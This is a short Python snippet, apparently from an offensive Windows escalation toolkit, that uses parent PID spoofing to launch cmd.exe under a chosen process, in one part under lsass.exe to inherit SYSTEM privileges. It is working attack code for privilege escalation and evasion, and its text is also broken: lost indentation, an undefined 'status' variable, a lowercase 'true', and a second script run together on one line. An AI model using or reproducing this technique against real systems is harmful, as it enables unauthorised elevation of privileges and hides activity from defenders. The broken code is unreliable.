def spoof(args):
if args['candidates'] == True:
printT("Candidates:")
esc = Escalation()
esc.printCandidatesSpoofPPID()
if args['pid'] == None:
logging.error("A pid has to be selected")
else:
printT("Trying to exploit parent PID Spoofing...")
esc = Escalation()
targetPID = args['pid']
esc.spoofPPID(ppid=targetPID,
appName="c:\\windows\\system32\\cmd.exe",
cmdLine=None,
lpProcessAttributes=None,
lpThreadAttributes=None,
bInheritHandles=0,
creationFlags=(CREATE_NEW_CONSOLE
| EXTENDED_STARTUPINFO_PRESENT),
lpEnvironment=None,
lpCurrentDirectory=None)
if status == true:
printT("Process created")
else:
logging.error("Impossible to create the new process")
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from utils import * configureLogging() from escalation import Escalation esc = Escalation() esc.printCandidatesSpoofPPID() ppidLSASS = getPIDfromName('lsass.exe') esc.spoofPPID(ppid=ppidLSASS, appName="c:\\windows\\system32\\cmd.exe", cmdLine=None, lpProcessAttributes=None, lpThreadAttributes=None, bInheritHandles=0, creationFlags=(CREATE_NEW_CONSOLE | EXTENDED_STARTUPINFO_PRESENT), lpEnvironment=None, lpCurrentDirectory=None)